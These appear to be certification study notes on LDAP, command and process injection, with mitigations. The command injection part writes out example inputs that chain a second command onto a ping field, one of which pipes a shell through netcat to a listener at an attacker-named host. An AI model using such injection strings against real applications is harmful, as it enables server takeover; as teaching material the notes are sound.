Injection Attacks

(OBJ 2.4)

Lightweight Directory Access Protocol (LDAP)

• An open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over an Internet Protocol network
• Often used to for authentication and storing information about users, groups and applications.

LDAP Injection

• An application attack that targets web-based applications by fabricating LDAP statements that are typically created by user input

  • Similar to how an attacker inserts malicious queries into an SQL Injection.

• Example:

  string ldapSearch = "(cn = $searchName")";
  System.out.println(ldapSearch);
  

  • Can actually allow an attacker to simply enter a wildcard character of star (*) into the username field and that would then be inserted as the search parameter and display all of your users on the system to your screen.

• Use input validation and input sanitization as protection against an LDAP injection attack

  • Same as protection for SQL and XML Injections

Command Injection

• Occurs when a threat actor is able to execute arbitrary shell commands on a host via a vulnerable web application
• Example:
  • If you have a web application that allows a user to test a connectivity with a remote website or server by simply entering in the IP address or host name, and then on the backend you're going to use the ping command, this could be subject to a command injection by simply appending a command to the app.
  • Might have a form that allows you to enter an IP address, etc.
  • ping maccgenics.com && hostname
    • Will be executed by the server shell
    • This would return the result of the ping command and then display the host name of that server.
  • ping maccgenics.com && /bin/sh | nc hacked.maccgenics.com 443
    • This would ping maccgenics.com and then move to the second command, which is starting up a shell and redirecting it over to netcat to a listener that I have set ip at hacked.maccgenics.com over port 443
    • Gives you full interactive access to the web server
• Input validation can also prevent command injections

Process Injection

• Method of executing arbitrary code in the address space of a separate live process
  • Running code int he context of another process may allow access to the process' memory system or network resources and possibly elevated privileges.
  • Masked under a legitimate process
• There are many different ways to inject code into a process
  • Injection through DLLs
  • Thread Execution Hijacking
  • Process Hollowing
  • Process Doppel Ganging
  • Asynchronous Procedure Calls
  • Portable Executable Injections
• Mitigation includes
  • Endpoint security solutions that are configured to block common sequences of attack behavior
  • Security Kernel Modules
  • Practice of Least Privilege